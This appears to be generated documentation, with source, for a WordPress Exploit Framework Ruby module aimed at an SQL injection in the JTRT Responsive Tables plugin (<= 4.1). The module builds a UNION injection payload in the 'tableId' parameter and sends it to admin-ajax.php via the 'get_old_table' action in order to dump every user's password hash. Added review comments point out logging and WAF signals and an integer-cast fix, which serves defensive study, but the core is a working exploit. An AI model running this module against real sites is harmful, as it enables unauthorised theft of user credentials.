class Wpxf::Auxiliary::JtrtResponsiveTablesHashDump
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 6
# Runs the superclass constructor, then registers this module's metadata
# through update_info.
#
# The metadata names the affected software (JTRT Responsive Tables <= 4.1),
# describes the issue as an SQL injection reachable by registered users of
# any level, and lists the WPVDB entry and disclosure URL to consult when
# triaging an installation.
#
# NOTE(review): the disclosure URL path contains 2017/09/11 while `date` is
# 'Nov 11 2017' - possibly a day/month mix-up; confirm against the advisory.
def initialize
  super

  credits = [
    'Lenon Leite', # Disclosure
    'rastating'    # WPXF module
  ]
  advisories = [
    ['WPVDB', '8953'],
    ['URL', 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/']
  ]

  update_info(
    name: 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump',
    desc: %( JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability which is exploitable by registered users of any level. This module utilises the vulnerability to dump the hashed passwords of all users in the database. ),
    author: credits,
    references: advisories,
    date: 'Nov 11 2017'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 30
# Delegates the vulnerability check to check_plugin_version_from_readme,
# passing the plugin slug and the version string '4.1.1', and returns that
# helper's result unchanged.
#
# NOTE(review): the module name covers "<= 4.1", so '4.1.1' is presumably
# the first fixed release and installations at or above it are expected to
# be unaffected - confirm against the helper and the vendor changelog.
def check
  plugin_slug = 'jtrt-responsive-tables'
  version_bound = '4.1.1'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
hashdump_number_of_cols()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 62
# Fixed column count reported to the HashDump base class.
#
# NOTE(review): presumably the number of columns selected by the plugin's
# own query, which the base class has to match - confirm against
# Wpxf::WordPress::HashDump.
#
# @return [Integer] always 5
def hashdump_number_of_cols
  5
end
hashdump_request_body()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 52
# Builds the request body: a hash with the single key 'tableId'. Its value
# is a minus sign, the output of Utility::Text.rand_numeric(2) (presumably
# two random digits), a UNION clause taken from hashdump_sql_statement, and
# a trailing '#'.
#
# Defensive reading: the parameter name suggests the plugin expects a plain
# numeric id (assumption - confirm in the plugin source), so a 'tableId'
# carrying anything other than digits is a strong signal for request
# logging and WAF rules. The durable fix on the plugin side is to cast the
# value to an integer or bind it through a prepared statement.
#
# @return [Hash{String => String}]
def hashdump_request_body
  random_id = Utility::Text.rand_numeric(2)
  union_clause = hashdump_sql_statement
  { 'tableId' => "-#{random_id} UNION #{union_clause} #" }
end
hashdump_request_method()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 42
# HTTP verb reported to the HashDump base class for the request.
#
# @return [Symbol] always :post
def hashdump_request_method
  :post
end
hashdump_request_params()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 46
# Request parameters reported to the HashDump base class: a single 'action'
# entry naming the 'get_old_table' handler.
#
# For log review, this action name together with the endpoint returned by
# vulnerable_url identifies the requests that reach the affected handler.
#
# @return [Hash{String => String}]
def hashdump_request_params
  params = {}
  params['action'] = 'get_old_table'
  params
end
hashdump_visible_field_index()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 58
# Fixed field index reported to the HashDump base class.
#
# NOTE(review): presumably the position of the column whose value is echoed
# back in the plugin's response; whether it is zero- or one-based is not
# visible here - confirm against Wpxf::WordPress::HashDump.
#
# @return [Integer] always 2
def hashdump_visible_field_index
  2
end
requires_authentication()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 34
# Tells the HashDump base class that a logged-in session is needed.
#
# The module description states that registered users of any level can
# reach the issue, so the lowest-privilege role is enough. Sites with open
# self-registration are therefore presumably the most exposed while the
# plugin is unpatched.
#
# @return [Boolean] always true
def requires_authentication
  true
end
reveals_one_row_per_request()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 38
# Tells the HashDump base class that each response yields a single row.
#
# NOTE(review): this presumably means the base class issues one request per
# user record, which would appear in access logs as a burst of near-identical
# POSTs from one session - confirm against Wpxf::WordPress::HashDump.
#
# @return [Boolean] always true
def reveals_one_row_per_request
  true
end
vulnerable_url()
# File lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb, line 66
# Endpoint reported to the HashDump base class: whatever
# wordpress_url_admin_ajax returns (presumably the site's admin-ajax.php
# URL - the helper is defined outside this file).
#
# For log review, this is the endpoint on which to look for the
# 'get_old_table' action carrying a non-numeric 'tableId'.
def vulnerable_url
  endpoint = wordpress_url_admin_ajax
  endpoint
end